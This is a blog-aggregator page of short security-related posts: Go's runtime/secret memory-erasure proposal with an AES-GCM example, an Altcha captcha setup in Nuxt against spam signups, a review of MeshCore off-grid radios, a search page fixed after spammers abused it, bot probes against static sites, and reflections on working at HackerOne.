What’s going on, Internet? While tech circles are grumbling about Mozilla stuffing AI features into Firefox that nobody asked for (lol), I figured I’d write about a feature people might actually like if they’re not already using it. This is how I’m containing the messy sprawl of the modern web using Firefox Containers. After the ability to run uBlock Origin, containers are easily one of Firefox’s best features. I’m happy to share my setup that helps contain the big bad evil and annoying across the web. Not because I visit these sites often or on purpose. I usually avoid them. But for the moments where I click something without paying attention, or I need to open a site just to get a piece of information and fail (lol, login walls), or I end up somewhere I don’t want to be. Containers stop that one slip from bleeding into the rest of my tabs. Firefox holds each site in its own space so nothing spills into the rest of my browsing. Here’s how I’ve split things up. Nothing fancy. Just tidy and logical. Nothing here is about avoiding these sites forever. It’s about containing them so they can’t follow me around. I use two extensions together: MAC handles the visuals. Containerise handles the rules. You can skip MAC and let Containerise auto-create containers, but you lose control over colours and icons, so everything ends up looking the same. I leave MAC’s site lists empty so it doesn’t clash with Containerise. Containerise becomes the single source of truth. If I need to open something in a specific container, I just right-click and choose Open in Container. Containers don’t fix the surveillance web, but they do reduce the blast radius. One random visit to Google, Meta, Reddit or Amazon won’t bleed into my other tabs. Cookies stay contained. Identity stays isolated. Tracking systems get far less to work with. Well, that’s my understanding of it anyway.
It feels like one of the last features in modern browsers that still puts control back in the user’s hands, without having to give up the open web. Just letting you know that I used ChatGPT (in a container) to help me create the regex here - there was no way I was going to be able to figure that out myself. So while Firefox keeps pandering to the industry with AI features nobody asked for (lol), there’s still a lot to like about the browser. Containers, uBlock Origin, and the general flexibility of Firefox still give you real control over your internet experience. Hey, thanks for reading this post in your feed reader! Want to chat? Reply by email or add me on XMPP, or send a webmention. Check out the posts archive on the website. Firefox Multi Account Containers (MAC) for creating and customising the containers (names, colours, icons). Containerise for all the routing logic using regex rules.

0 views
Hugo 1 week ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page:

```html
<!-- The original snippet was lost in extraction; an illustrative example: -->
<img src="https://miro.medium.com/v2/resize:fit:700/some-image.jpg">
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<!-- Lost in extraction; per the text below, a file:// URL, for example: -->
<img src="file:///etc/passwd">
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<!-- Lost in extraction; an illustrative example targeting an internal service: -->
<img src="http://localhost:8080/admin">
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
<!-- Lost in extraction; an innocent-looking URL the attacker controls: -->
<img src="https://attacker.com/image.jpg">
```

And this could still be risky if the hacker makes this URL redirect to /etc/passwd. So we need to block redirect responses:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test everything in time to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!-- Reconstructed; the angle-bracketed markup was lost in extraction: -->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
...
&xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!-- Reconstructed: -->
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!-- Reconstructed; one common variant of the exfiltration DTD: -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
%all;
%send;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!-- Reconstructed; the classic "billion laughs" payload: -->
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!-- ... lol3 through lol8 follow the same pattern ... -->
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<item>
  <title>&lol9;</title>
  <status>publish</status>
  <type>post</type>
</item>
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture-the-flag events at Mixit. And he loves trying to find this kind of vulnerability.
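As a quick sanity check (my sketch, not from the original post, assuming the JDK's default Xerces-based parser), the key flag above makes the parser refuse any document carrying a DOCTYPE before entities are even expanded:

```kotlin
import java.io.StringReader
import javax.xml.parsers.DocumentBuilderFactory
import org.xml.sax.InputSource
import org.xml.sax.SAXParseException

// Returns true if the hardened parser refuses the document.
fun isRejected(xml: String): Boolean {
    val factory = DocumentBuilderFactory.newInstance()
    // The central hardening flag from above: refuse DOCTYPE declarations outright
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
    return try {
        factory.newDocumentBuilder().parse(InputSource(StringReader(xml)))
        false
    } catch (e: SAXParseException) {
        true // parsing aborts as soon as the DOCTYPE is seen
    }
}

fun main() {
    // A document smuggling an entity declaration: refused before expansion
    println(isRejected("""<!DOCTYPE foo [ <!ENTITY x "y"> ]><root>&x;</root>"""))
    // A plain document: parses normally
    println(isRejected("<root>ok</root>"))
}
```

Because the DOCTYPE itself is rejected, none of the payload variants above (file read, blind exfiltration, billion laughs) ever reach entity expansion.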

0 views
neilzone 2 weeks ago

Using a2dismod to disable apache2's mod_status, which exposed information via a .onion / Tor hidden service

Earlier this week, I received a vulnerability report. The report said that, when accessing the site/server via the .onion / Tor hidden service URL, it was possible to view information about the server, and live connections to it, because of mod_status. mod_status is an apache2 default module, which shows information about the apache2 server on /server-status. It is only available via localhost but, because of the default configuration of a Tor .onion/hidden service, which entails proxying to localhost, it was available. The report was absolutely valid, and I am grateful for it. Thank you, kind anonymous reporter. It was easily fixed, made all the more annoying because I knew about this issue (it has been discussed for years) but forgot to disable the module when I moved the webserver a few months ago. One to chalk up to experience. I have had a security.txt file in place on the decoded.legal website for quite a while now, but I’ve never had anyone use it. I asked the person who reported it to me if they had contacted me via it, but no, they had not.

0 views
マリウス 2 weeks ago

Be Your Own Privacy-Respecting Google, Bing & Brave

Search engines have long been a hot topic of debate, particularly among the tinfoil-hat-wearing circles on the internet. After all, these platforms are in a unique position to collect vast amounts of user data and identify individuals with unsettling precision. However, with the shift from traditional web search, driven by search queries and result lists, to an LLM-powered question-and-answer flow across major platforms, concerns have grown and it’s no longer just about privacy: Today, there’s increasing skepticism about the accuracy of the results. In fact, it’s not only harder to discover new information online, but verifying the accuracy of these AI-generated answers has become a growing challenge. As with any industry upended by new technology, a flood of alternatives is hitting the market, promising to be the antidote to the established players. However, as history has shown, many of these newcomers are unlikely to live up to their initial hype in the long run. Meanwhile, traditional search services are either adopting the same LLM-driven approach or shutting down entirely. However, as long as major search engines still allow software to tap into their vast databases without depending too heavily on their internal algorithms and AI-generated answers, there’s some hope. We can take advantage of these indexes and create our own privacy-respecting search engines that prioritize the content we actually want to see. Let’s check how to do so using the popular metasearch engine SearXNG on OpenBSD! SearXNG is a free and open-source metasearch engine, initially forked from Searx after its discontinuation, which can tap into over 70 different search engines for results. Note: SearXNG is not a search engine but a metasearch engine, which means that it does not have its own index but instead uses existing indexes from e.g. Google, Brave, Bing, Mojeek, and others.
What SearXNG does is run your search query through all of the search engines that you have enabled on your SearXNG instance, after which it applies custom prioritization and removal rules in an effort to tailor the results to your taste. SearXNG is not particularly resource-intensive and doesn’t require significant storage space, as it does not maintain its own search index. However, depending on your performance requirements, you may need to choose between slightly longer wait times or higher costs, especially for cloud instances. I tested SearXNG on a Vultr instance with 1 vCPU and 1GB of RAM, and it performed adequately. That said, for higher traffic or more demanding usage, you’ll need to allocate more CPU and RAM to ensure optimal performance. Let’s start by setting up the base system. This guide assumes you’re using the latest version of OpenBSD (7.8, at the time of writing) and that you’ve already configured and secured SSH access. Additionally, your firewall should be set up to allow traffic on ports 22, 80, and 443. Ideally, you should also have implemented preventive measures against flooding and brute-force attacks, such as PF ’s built-in rate limiting. Note: I’m going to use as domain for this specific setup, as well as as hostname for the SearXNG instance. Make sure to replace these values with your domain/preferred hostname in the configuration files below. First, let’s install the dependencies that we need: The default configuration of redis works just fine for now, so we can enable and start the service right away: Next, we create a dedicated user for SearXNG: With the newly created user we clone the SearXNG repository from GitHub and set up a Python virtual environment: Next, we copy the default configuration from the repository to ; Make sure to beforehand: While the default settings will work just fine, it’s advisable to configure the according to your requirements.
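The exact commands didn't survive in this copy of the post, but on OpenBSD the sequence sketched above typically looks something like the following. Package and user names here are my assumptions, not the author's:

```shell
# Assumed package names - check what pkg_info actually reports on your system
doas pkg_add git redis nginx

# Enable and start redis with its default configuration
doas rcctl enable redis
doas rcctl start redis

# Create a dedicated user for SearXNG
doas useradd -m searxng

# As that user: clone the repository and set up a Python virtual environment
doas -u searxng sh -c '
  cd ~searxng &&
  git clone https://github.com/searxng/searxng.git &&
  cd searxng &&
  python3 -m venv venv &&
  . venv/bin/activate &&
  pip install -U pip setuptools wheel &&
  pip install -e .
'
```

Treat this as a rough map of the steps rather than a copy-paste recipe; the post's own (missing) commands are authoritative.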
One key element that will make or break your experience with SearXNG is the plugin and its configuration. Make sure to enable the plugin: … and make sure to properly configure it: The configuration tells SearXNG to rewrite specific URLs. This is especially useful if you’re not running LibRedirect but would still like results from e.g. X.com to open on Xcancel.com instead. The configuration contains URLs that you want SearXNG to completely remove from your search results, e.g. Pinterest, Facebook or LinkedIn (unless you need those for OSINT). The configuration lists URLs that SearXNG should de-prioritize in your search results. The setting, on the other hand, does the exact opposite: It instructs SearXNG to prioritize results from the listed URLs. If you need examples for those files feel free to check the lycos.lol repository. PS: Definitely make sure to change the ! We’re going to run SearXNG using uWSGI, a popular Python web application server. To do so, we create the file with the following content: Next, we create the file with the following content: This way we can use to enable and run uWSGI by issuing the following commands: Info: In case the startup should fail, it is always possible to and start uWSGI manually to see what the issue might be: For serving the Python web application we use Nginx. Therefore, we create with the following content: We include this file in our main configuration: Note: I’m not going to dive into the repetitive SSL setup, but you can find plenty of other write-ups on this site that explain how to configure it on OpenBSD. Next, we enable Nginx and start it: You should be able to access your SearXNG instance by navigating to in a browser. In case you encounter issues with the semaphores required for interprocess communication within uWSGI, make sure to check the settings and increase the relevant parameter, e.g.
by adding the following line to : As can be seen, setting up a SearXNG instance on OpenBSD is fairly easy and doesn’t require much work. However, configuring it to your liking so that you get the search results you’re interested in is going to require more effort and time. Especially the plugin is likely something that will evolve over time, the more you use the search engine. At this point, however, you’re ready to enjoy your self-hosted, privacy-respecting metasearch engine based upon SearXNG! :-) I had registered the domain for this closed-access SearXNG instance. However, a day after the domain became active, NIC.LOL set the domain status to . I asked Njalla, my registrar, if they would know more and their reply was: Right now the domain in question has the status code “serverHold”. serverHold is a status code set by the registry (the one that manages the whole TLD) and that means they have suspended the domain name because the domain violated their terms or rules. Upon further investigation, it became clear that the domain was falsely flagged by everyone’s favorite tax-haven-based internet bully, Spamhaus. After all, when the domain was dropped globally the only thing that was visible on the domain’s Nginx was an empty page. The domain also didn’t have (and still hasn’t) any MX records configured. I reached out to Spamhaus who replied with the following message: Thank you for contacting the Spamhaus Ticketing system, It appears that this ticket was submitted using a disposable or temporary email address; because of this, we cannot confirm its authority. To ensure that we can help you, please do not use a temporary email address (this includes freemails such as gmail.com, hotmail.com, etc) and ensure that the ticket contains the following: When these issues have been resolved, another ticket may be opened to request removal.
– Regards, Marvin Adams The Spamhaus Project Spamhaus flagged the domain I just purchased, which I could have used for sending email. Upon contacting them, they then closed my ticket because I was using a temporary email address instead of, let’s say, my own lycos.lol domain. And even though it was a free or temporary email address that I had sent the email from, I thought it was my domain registrar’s responsibility to handle KYC, not Spamhaus's. I’ve always known that Spamhaus is an incompetent and corrupt organization, but I didn’t fully realize how dysfunctional they are until now. Also, shoutout to NIC.LOL for happily taking my cash without providing any support in this matter whatsoever. This serves as a harsh reminder that the once fun place we called the internet is dead and that everything these days is controlled by corporations which you’re always at the mercy of. It also highlights how misleading and inaccurate some popular posts on sites like Hacker News can be, e.g. “Become unbannable from your email”. They’re not just lacking in detail but they’re obviously wrong about the unbannable part. After some back-and-forth, I managed to get back online and set up the SearXNG instance. The instance will be available to members of the community channel. Additionally, I’ve taken further steps to protect this website from future hostility by Spamhaus: Say hello to ! More on that in a future status update. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program. Learn why. Information that makes clear the requestor’s authority over the domain or IP Details on how the issue(s) have been addressed Reference any other Spamhaus removal ticket numbers related to this case

0 views
DHH 2 weeks ago

No backup, no cry

I haven't done a full-system backup since back in the olden days before Dropbox and Git. Every machine I now own is treated as a stateless, disposable unit that can be stolen, lost, or corrupted without consequences. The combination of full-disk encryption and distributed copies of all important data means there's just no stress if anything bad happens to the computer. But don't mistake this for just an "everything is in the cloud" argument. Yes, I use Dropbox and GitHub to hold all the data that I care about, but the beauty of these systems is that they work with local copies of that data, so with a couple of computers here and there, I always have a recent version of everything, in case either syncing service should go offline (or away!). The trick to making this regime work is to stick with it. This is especially true for Dropbox. It's where everything of importance needs to go: documents, images, whatever. And it's instantly distributed on all the machines I run. Everything outside of Dropbox is essentially treated as a temporary directory that's fully disposable. It's from this principle that I built Omarchy too. Given that I already had a way to restore all data and code onto a new machine in no time at all, it seemed so unreasonable that the configuration needed for a fully functional system still took hours on end. Now it's all encoded in an ISO setup that installs in two minutes on a fast computer. Now it's true that this method relies on both multiple computers and a fast internet connection. If you're stuck on a rock in the middle of nowhere, and you somehow haven't discovered the glory of Starlink, maybe just stick to your old full-disk backup ways. But if you live in the modern world, there ought to be no reason why a busted computer is a calamity of data loss or a long restore process.

1 view
The Jolly Teapot 2 weeks ago

Praise the Backup

Well, that was a fun weekend. I have spent half of my time reinstalling MacOS Sequoia, and trying to get it back the way it was, while trying to avoid losing important files. You see, on that chilly Saturday afternoon, I wanted to take care of my ageing computer, and tried an app that was supposed to clean the old files and “residue” from previously uninstalled apps. As a reader of this blog, you may know that I tend to use very few apps, but I try a lot of them. Trying a lot of apps means doing a lot of installs, and then a lot of uninstall processes. So, while experimenting with yet another app, it crashed in the middle of its cleaning work. And, because I was being dumb, I thought it would be a good idea to empty the bin at that moment. 5, 10, 15, 20, 25… These were the thousands of files being deleted permanently from the bin. Even with lots of old app files, the number still seemed rather high. I stopped the process only after losing thousands of files and realised that this cleaning app had put in the bin a lot of files and folders that it shouldn't have. A lot of files and folders. My blog files with all my Eleventy settings, all of it. Most of my system preference files. The app even deleted its own application files, which is why the app crashed, I believe. None of my other apps or extensions could be launched, error messages everywhere. I was having a lot of fun. I restarted my computer, hoping the powerful reboot spirits would once again act miraculously, but my dear old MacBook Air welcomed me as if it were a brand-new Mac, an almost fresh installation. Even my keyboard was set to the wrong layout (which made it truly fantastic to enter a password in such a moment of panic), my wallpaper was gone, the dock was featuring all the default apps, and I was logged off my iCloud account. Thankfully, this last part turned out to be a good thing because my personal and most important files, stored on iCloud Drive, were safe from whatever had happened on my machine.
I also had a two-month-old backup on an external SSD, mirrored on JottaCloud. The cherry on top was that I couldn’t use the “Put Back” right-click action on the files left in the bin as they were not put there by the Finder, but by this third-party app. 1 There were 1,200 or so files and folders left, most of them obscure preference files. Needless to say, I didn’t really bother taking hours of my weekend putting them back where they belonged, even if I knew how. I scavenged what I could, everything that seemed important — including a folder called “BBEdit Backups” (more on that later) — and used this opportunity to start anew. Since my last backup was two months old, needless to say, I had a decent amount of work to do putting everything back together, including the last four posts of the website you're reading — which had been vaporised from my computer. I had to reinstall all my apps, my preferences, my keyboard shortcuts, everything that I could, while I could still recall what they were in detail. I won’t blame the app that caused all of this, or my old computer, as much as I will blame myself. I should have been more careful about how to use it properly, I shouldn’t have decided to empty the bin at that moment, and I should have done better and more frequent backups: once every quarter is definitely not enough. The clean MacOS install experience itself was not great: It was very slow, annoying, and during all this time I worried about not being able to connect to my site again or make Eleventy work the same way it did (sorry if I get a little PTSD). 2 Today, as I write this, my computer doesn’t really feel any faster; a clean install can only do so much on the last generation of Intel MacBook Airs. MacOS was a pain, and I was reminded of my Windows user days more than I expected.
For example, I kept getting a message along the lines of “The widget blahblahblah is a different version from a previous version of that widget, do you want to open it?” and clicking “No” just brought back the pop-up window three or four more times before it eventually went away. The prompt even interrupted me while I was trying to type my complicated Wi-Fi password. Not once, not twice, but thrice. Now, everything seems fine. Eleventy works. Xmit works. BBEdit is just like it was. This whole experience made me realise three main things.

That BBEdit is, indeed, just too good. I’m not sure if I could have brought everything back so quickly and confidently without this app. The BBEdit automated backup folder, the one I found in the bin, really saved me. Many of the most recent versions of the Jolly Teapot text files were still there, so I didn’t have to import the text from the live website. Just when I thought I couldn’t love this app more than I already did. I’m proud of myself for thinking of creating a backup of my BBEdit preferences too.

That I seriously needed to create a better backup system so that in the event of something like this happening again, whether a human error or an app shitting the bed, I would only have a week or two of files to recover, and not a whole nine weeks of them. I just created an Automator workflow to help me automate my backups and include more files. I considered using Time Machine on my external SSD, or using an app like Hazel, but for my minimal needs, this Automator workflow should do just fine.

That I may have actually enjoyed all of this: the crash and this weird situation gave me an excuse to both operate a clean installation on my Mac and justify the purchase of a new one. I will probably wait until March for the next generation of MacBooks Air, but the regular M5 MacBook Pro has never looked so good.

Apologies if you see anything weird on this site: some little layout issues and typos that were fixed in the last two months may have returned. Please let me know if you see anything suspicious (or any of the usual typos). In the meantime, don’t be an idiot like me: take care of those backups.

I won’t name the app in this post because I’m not 100% sure if the app was the sole guilty party in this affair, if guilty at all. Maybe I didn’t set it up right, maybe it’s all my fault!  ↩︎ As the song goes.  ↩︎

iDiallo 2 weeks ago

Making a quiet stand with your privacy settings

After one of the largest refactors of our application, several months in the making, we had tackled some of our biggest challenges: we paid down technical debt, upgraded legacy software, fortified security, and even made the application faster. After all that, we deployed the application and held our breath, waiting for the user feedback to roll in. Well, nothing came in. There were no celebratory messages about the improved speed, no complaints about broken features, no comments at all. The deployment was so smooth it was invisible. To the business team, it initially seemed like we had spent vast resources for no visible return. But we knew the underlying truth. Sometimes, the greatest success is defined not by what happens, but by what doesn't happen. The server that doesn't crash. The data breach that doesn't occur. The user who never notices a problem. This is the power of a quiet, proactive defense. In this digital world, where everything we do leaves a data point, it's not easy to recognize success. When it comes to privacy, taking a stand isn't dramatic. In fact, its greatest strength is its silence. We're conditioned to believe that taking a stand should feel significant. We imagine a public declaration, a bold button that flashes "USER REBELLION INITIATED!" when pressed. Just think about people publicly announcing they are leaving a social media platform. But the reality of any effective digital self-defense is far more mundane. When I disagree with a website's data collection, I simply click "Reject All." No fanfare. No message telling the company, "This user is privacy-conscious!" My resistance is registered as a non-action. A void in their data stream. When I read that my Vizio Smart TV was collecting viewing data, I navigated through a labyrinth of menus to find the "Data Collection" setting and turned it off. The TV kept working just fine.
Nothing happened, except that my private viewing habits were no longer becoming a product to be sold. They didn't add a little icon in the top corner that signifies "privacy-conscious." Right now, many large language models like ChatGPT have "private conversation" settings turned off by default. When I go into the settings and enable the option that says, "Do not use my data for training," there's no confirmation, no sense of victory. It feels like I've done nothing. But I have. This is what proactive inaction looks like. Forming a new habit is typically about adding an action. Going for a run every morning, drinking a glass of water first thing, reading ten pages a night. But what about the habit of not doing? When you try to simply "not eat sugar," you're asking your brain to form a habit around an absence. There's no visible behavior to reinforce, no immediate sensory feedback to register success, and no clear routine to slot into the habit loop. Instead, you're relying purely on willpower, a finite resource that depletes throughout the day, making evening lapses almost inevitable. Your brain literally doesn't know what to practice when the practice is "nothing." It's like trying to build muscle by not lifting weights. The absence of action creates an absence of reinforcement, leaving you stuck in a constant battle of conscious resistance rather than unconscious automation. Similarly, the habit of not accepting default settings is a habit of inaction. You are actively choosing not to participate in a system designed to exploit your data. It's hard because it lacks the dopamine hit of a checked box. There's no visible progress bar for "Privacy Secured." But the impact is real. This quiet practice is our primary defense against what tech writer Cory Doctorow calls "enshittification": the process where platforms decay by first exploiting users, then business customers, until they become useless, ad-filled pages with content sprinkled around.
It's also our shield against hostile software that prioritizes its own goals over yours. Not to blame the victims, but I like to remind people that they have agency over the software and tools they use. And your agency includes the ultimate power to walk away. If a tool's settings are too hostile, if it refuses to respect your "no," then your most powerful setting is the "uninstall" button. Choosing not to use a disrespectful app is the ultimate, and again, very quiet, stand. So, I challenge everyone to embrace the quiet. See the "Reject All" button not as a passive refusal, but as an active shield. See the hidden privacy toggle not as a boring setting, but as a toggle that you actively search for. The next time you download a new app or create a new account, take five minutes. Go into the settings. Look for "Privacy," "Data Sharing," "Personalization," or "Permissions." Turn off what you don't need. Nothing will happen. Your feed won't change, the app won't run slower, and no one will send you a congratulatory email. And that's the whole point. You will have succeeded in the same way our refactor succeeded: by ensuring something unwanted doesn't happen. You've strengthened your digital walls, silently and without drama, and in doing so, you've taken one of the most meaningful stands available to us today.

Filippo Valsorda 2 weeks ago

The 2025 Go Cryptography State of the Union

This past August, I delivered my traditional Go Cryptography State of the Union talk at GopherCon US 2025 in New York. It goes into everything that happened at the intersection of Go and cryptography over the last year. You can watch the video (with manually edited subtitles, for my fellow subtitles enjoyers) or read the transcript below (for my fellow videos not-enjoyers). The annotated transcript below was made with Simon Willison’s tool. All pictures were taken around Rome, the Italian countryside, and the skies of the Northeastern United States. Welcome to my annual performance review. We are going to talk about all of the stuff that we did in the Go cryptography world during the past year. When I say "we," it doesn't mean just me, it means me, Roland Shoemaker, Daniel McCarney, Nicola Morino, Damien Neil, and many, many others, both from the Go team and from the Go community that contribute to the cryptography libraries all the time. I used to do this work at Google, and I now do it as an independent as part of and leading Geomys, but we'll talk about that later. When we talk about the Go cryptography standard libraries, we talk about all of those packages that you use to build secure applications. That's what we make them for. We do it to provide you with encryption and hashes and protocols like TLS and SSH, to help you build secure applications. The main headlines of the past year: We shipped post-quantum key exchanges, which is something that you will not have to think about and will just be solved for you. We have solved FIPS 140, which some of you will not care about at all and some of you will be very happy about. And the thing I'm most proud of: we did all of this while keeping an excellent security track record, year after year. This is an update to something you've seen last year. The Go Security Track Record It's the list of vulnerabilities in the Go cryptography packages.
We don't assign a severity—because it's really hard—instead they're graded on the "Filippo's unhappiness score." It goes shrug, oof, and ouch. Time goes from bottom to top, and you can see how as time goes by things have been getting better. People report more things, but they're generally more often shrugs than oofs, and there haven't been ouches. More specifically, we haven't had any oof since 2023. We haven't had any Go-specific oof since 2021. When I say Go-specific, I mean: well, sometimes the protocol is broken, and as much as we want to also be ahead of that by limiting complexity, you know, sometimes there's nothing you can do about that. And we haven't had ouches since 2019 . I'm very happy about that. But if this sounds a little informal, I'm also happy to report that we had the first security audit by a professional firm. Trail of Bits looked at all of the nuts and bolts of the Go cryptography standard library: primitives, ciphers, hashes, assembly implementations. They didn't look at the protocols, which is a lot more code on top of that, but they did look at all of the foundational stuff. And I'm happy to say that they found nothing . Two of a kind t-shirts, for me and Roland Shoemaker. It is easy though to maintain a good security track record if you never add anything, so let's talk about the code we did add instead. First of all, post-quantum key exchanges. We talked about post-quantum last year, but as a very quick refresher: Now, we focused on post-quantum key exchange because the key exchange defends against the most urgent risk, which is that somebody might be recording connections today, keeping them saved on some storage for the next 5-50 years and then use the future quantum computers to decrypt those sessions. I'm happy to report that we now have ML-KEM, which is the post-quantum key exchange algorithm selected by the NIST competition, an international competition run in the open.
You can use it directly from the crypto/mlkem standard library package starting in Go 1.24, but you're probably not gonna do that. Instead, you're probably going to just use crypto/tls, which by default now uses a hybrid of X25519 and ML-KEM-768 for all connections with other systems that support it. Why hybrid? Because this is new cryptography. So we are still a little worried that somebody might break it. There was one that looked very good and had very small ciphertext, and we were all like, “yes, yes, that's good, that's good.” And then somebody broke it on a laptop. It was very annoying. We're fairly confident in lattices. We think this is the good one. But still, we are taking both the old stuff and the new stuff, hashing them together, and unless you have both a quantum computer to break the old stuff and a mathematician who broke the new stuff, you're not breaking the connection. crypto/tls can now negotiate that with Chrome and can negotiate that with other Go 1.24+ applications. Not only that, we also removed any choice you had in ordering of key exchanges because we think we know better than you and— that didn't come out right, uh. … because we assume that you actually want us to make those kind of decisions, so as long as you don't turn it off, we will default to post-quantum. You can still turn it off. But as long as you don't turn it off, we'll default to the post-quantum stuff to keep your connection safe from the future. Same stuff with x/crypto/ssh. Starting in v0.38.0. SSH does the same thing, they just put X25519 and ML-KEM-768 in a different order, which you would think doesn't matter—and indeed it doesn't matter—but there are rules where "no, no, no, you have to put that one first." And the other rule says "no, you have to put that one first." It's been a whole thing. I'm tired. OpenSSH supports it, so if you connect to a recent enough version of OpenSSH, that connection is post-quantum and you didn't have to do anything except update. 
Okay, but you said key exchanges and digital signatures are broken. What about the latter? Well, key exchanges are urgent because of the record-now-decrypt-later problem, but unless the physicists that are developing quantum computers also develop a time machine, they can't use the QC to go back in time and use a fake signature today. So if you're verifying a signature today, I promise you it's not forged by a quantum computer. We have a lot more time to figure out post-quantum digital signatures. But if we can, why should we not start now? Well, it's different. Key exchange, we knew what hit we had to take. You have to do a key exchange, you have to do it when you start the connection, and ML-KEM is the algorithm we have, so we're gonna use it. Signatures, we developed a lot of protocols like TLS, SSH, back when it was a lot cheaper to put signatures on the wire. When you connect to a website right now, you get five signatures. We can't send you five 2KB blobs every time you connect to a website. So we are waiting to give time to protocols to evolve, to redesign things with the new trade-offs in mind of signatures not being cheap. We are kind of slow rolling intentionally the digital signature side because it's both not as urgent and not as ready to deploy. We can't do the same “ta-da, it's solved for you” show because signatures are much harder to roll out. Let's talk about another thing that I had mentioned last year, which is FIPS 140. FIPS 140 is a US government regulation for how to do cryptography. It is a list of algorithms, but it's not just a list of algorithms. It's also a list of rules that the modules have to follow. What is a module? Well, a module used to be a thing you would rack. All the rules are based on the idea that it's a thing you can rack. Then the auditor can ask “what is the module’s boundary?” And you're like, “this shiny metal box over here." And, you know, that works. 
